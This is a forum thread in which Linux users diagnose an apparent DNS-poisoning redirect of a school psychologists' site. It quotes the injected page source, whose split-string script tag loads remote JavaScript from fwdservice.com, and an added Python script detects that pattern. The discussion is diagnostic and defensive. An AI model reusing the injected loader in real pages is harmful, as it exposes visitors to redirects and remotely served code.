
#1 2013-09-05 21:42:42

cfr
Member
From: Cymru
Registered: 2011-11-27
Posts: 7,156

Information about fwdservice dot com?

Note that urls in this post are deliberately obfuscated.

Earlier today I tried to access www <dot> casponline <dot> org which is supposed to be the site of the California Association of School Psychologists. When I had trouble viewing content, I enabled javascript for two sites the page seemed to need: cdn <dot> rooktemplate <dot> com and fwdservice <dot> com. This didn't seem to help much. I went from blank content to perpetual loading.

As far as I can tell fwdservice is associated with Windows malware which redirects attempts to access various webpages to fwdservice's site. I am guessing this simply fails on Linux but does anybody know anything more about this? The information about Windows is what I gleaned from a web search but I am not sure how reliable it is or if there is more to this. Because I was on campus at the time, the university's rule set typically blocks malware sites. (E.g. a link which would take me somewhere at home will be blocked on campus.) Obviously that's only a certain proportion of what's out there, however, so it doesn't show the information isn't reliable.

I am pretty sure that casponline should be a legitimate site or used to be one as I've found links to it from enough kosher-looking pages for it to seem unlikely they are all fake. (And they are always pages about psychological research etc.)


CLI Paste | How To Ask Questions

Arch Linux | x86_64 | GPT | EFI boot | refind | stub loader | systemd | LVM2 on LUKS
Lenovo x270 | Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz | Intel Wireless 8265/8275 | US keyboard w/ Euro | 512G NVMe INTEL SSDPEKKF512G7L

Offline

#2 2013-09-05 21:49:14

WorMzy
Administrator
From: Scotland
Registered: 2010-06-16
Posts: 12,645

Re: Information about fwdservice dot com?

It seems to work fine here, and a free malware scanner doesn't report any problems (http://scanurl.net/?u=casponline.org&ue … RL#results)

Could it be something you need to bring up with the university's IT help desk?


Sakura:-
Mobo: MSI MAG X570S TORPEDO MAX // Processor: AMD Ryzen 9 5950X @4.9GHz // GFX: AMD Radeon RX 5700 XT // RAM: 32GB (4x 8GB) Corsair DDR4 (@ 3000MHz) // Storage: 1x 3TB HDD, 6x 1TB SSD, 2x 120GB SSD, 1x 275GB M2 SSD

Making lemonade from lemons since 2015.

Offline

#3 2013-09-05 21:50:52

alphaniner
Member
From: Ancapistan
Registered: 2010-07-12
Posts: 2,810

Re: Information about fwdservice dot com?

The primary website loaded fine for me with Noscript blocking everything (itself and caspwebcasts.org). I allowed 'itself' and nothing new appeared in the list, i.e. no evidence of rooktemplate or fwdservice.

Maybe it was compromised and has been fixed, or maybe your DNS was poisoned?

Last edited by alphaniner (2013-09-05 21:52:39)


But whether the Constitution really be one thing, or another, this much is certain - that it has either authorized such a government as we have had, or has been powerless to prevent it. In either case, it is unfit to exist.
-Lysander Spooner

Offline

#4 2013-09-05 21:55:33

progandy
Member
Registered: 2012-05-17
Posts: 5,280

Re: Information about fwdservice dot com?

alphaniner wrote:

The primary website loaded fine for me with Noscript blocking everything (itself and caspwebcasts.org). I allowed 'itself' and nothing new appeared in the list, i.e. no evidence of rooktemplate or fwdservice.

Maybe it was compromised and has been fixed, or maybe your DNS was poisoned?

Same for me.
The IP for casponline.org should be 68.171.213.42 (at least for me).


| alias CUTF='LANG=en_XX.UTF-8@POSIX ' |

Offline

#5 2013-09-05 23:00:45

cfr
Member
From: Cymru
Registered: 2011-11-27
Posts: 7,156

Re: Information about fwdservice dot com?

OK. If I ping casponline.org, I get the same ip (68.171.213.42). If I load that ip in my browser and allow it to load the script, it all looks fine. But if I load www.casponline.org, I get nothing and the source code for the page is completely different.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">var NREUMQ=NREUMQ||[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]);</script><title>Loading...</title>
<script src="http://cdn.rooktemplate.com/rmgdsc/newProcess.js?v3.1" type="text/javascript" language="javascript"></script>
</head>
<body>
<div id="rmgblock"></div>
	<script type="text/javascript" id="_rMG_fir">
var _pR="gkwrf="+"",_folio="775974688",_bkt="8171";
var _adPage="<scr"+"ipt id=\"_rMG_dyn\" type=\"text/javascript\" language=\"JavaScript\""+" src=\"http://fwdservice.com/main.php?dmn="+"casponline.org"+"&folio="+_folio+"&"+_pR+"&bkt="+_bkt+"\">"+ "</scr" + "ipt>";
document.write(_adPage);
</script>
<script type="text/javascript">if(!NREUMQ.f){NREUMQ.f=function(){NREUMQ.push(["load",new Date().getTime()]);var e=document.createElement("script");e.type="text/javascript";e.src=(("http:"===document.location.protocol)?"http:":"https:")+"//"+"js-agent.newrelic.com/nr-100.js";document.body.appendChild(e);if(NREUMQ.a)NREUMQ.a();};NREUMQ.a=window.onload;window.onload=NREUMQ.f;};NREUMQ.push(["nrfj","beacon-2.newrelic.com","6bc175e1c8","2059687","blxaMRFVWEFSUENfWVcWbRcKG19cV1ZPGEZRSQ==",0,118,new Date().getTime(),"","","","",""]);</script></body></html>

I get the same result at home as on campus (but I'm on the same machine). So how would my DNS get poisoned and can I unpoison it?

Though if DNS was poisoned, wouldn't it affect ping as well?

EDIT: I just sshed into a machine at work (which I am about to lose, but still for today...) and found that ping www.casponline.com uses an ip address of 107.20.206.69. So could that have been the address I got given earlier when using my laptop on campus? Now I'm home so I get the right result from ping. But why would firefox still use the same ip as earlier? I tried removing the cache but it didn't make any difference. Is there something further I need to do? (And is this likely to indicate a more serious problem?)

The machine I sshed to is running Fedora 19 so it is definitely not likely to be an Arch-specific screw-up on my part, if you see what I mean.

Last edited by cfr (2013-09-05 23:32:14)



Offline
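As an added example (not part of the thread, and not code from any project mentioned in it), here is a small audit script that flags what the pasted page source above shows: scripts pulled from hosts other than the site itself, and an inline script that assembles a "<scr"+"ipt" tag and feeds it to document.write. The sample HTML is a constructed, trimmed copy of the markup cfr pasted.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: trimmed copy of the injected page source quoted above.
SAMPLE_HTML = """<html><head><title>Loading...</title>
<script src="http://cdn.rooktemplate.com/rmgdsc/newProcess.js?v3.1" type="text/javascript"></script>
</head><body><div id="rmgblock"></div>
<script type="text/javascript" id="_rMG_fir">
var _pR="gkwrf="+"",_folio="775974688",_bkt="8171";
var _adPage="<scr"+"ipt id=\\"_rMG_dyn\\" src=\\"http://fwdservice.com/main.php?dmn="+"casponline.org"+"\\">"+"</scr"+"ipt>";
document.write(_adPage);
</script></body></html>"""

class ScriptCollector(HTMLParser):
    """Collect external <script src=...> URLs and the bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._buf, self._in_script = [], False

# "<scr"+"ipt": a script tag split across string literals so naive filters miss it
SPLIT_TAG = re.compile(r'"<scr"\s*\+\s*"ipt', re.I)
# host names inside URL string literals in inline script bodies
URL_LITERAL = re.compile(r'https?://([A-Za-z0-9.-]+)')

def audit_page(html, site_host):
    """Return (sorted third-party script hosts, list of findings) for one page."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    hosts = {urlparse(u).hostname for u in p.external}
    findings = []
    for body in p.inline:
        if SPLIT_TAG.search(body) and "document.write" in body:
            findings.append("document.write of a string-assembled <script> tag")
        hosts.update(URL_LITERAL.findall(body))
    third_party = sorted(h for h in hosts if h and not h.endswith(site_host))
    return third_party, findings
```

Run audit_page over the HTML you actually received (e.g. from curl) rather than what the browser shows, since the document.write only executes when scripts are enabled.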

#6 2013-09-05 23:52:52

cfr
Member
From: Cymru
Registered: 2011-11-27
Posts: 7,156

Re: Information about fwdservice dot com?

I hope I will be excused for a new post at this point as I edited the last one a number of times.

So here is how I resolved the issue in firefox:
* about:config
* change network.dnsCacheExpirationGracePeriod from 2592000 to 0
* visit www.casponline.com -> get correct site
* change network.dnsCacheExpirationGracePeriod from 0 back to default 2592000

Questions:
* is the default a good value for this setting?
* is my machine likely to be compromised in other ways?
* is the university network likely to be untrustworthy in other ways?!



Offline
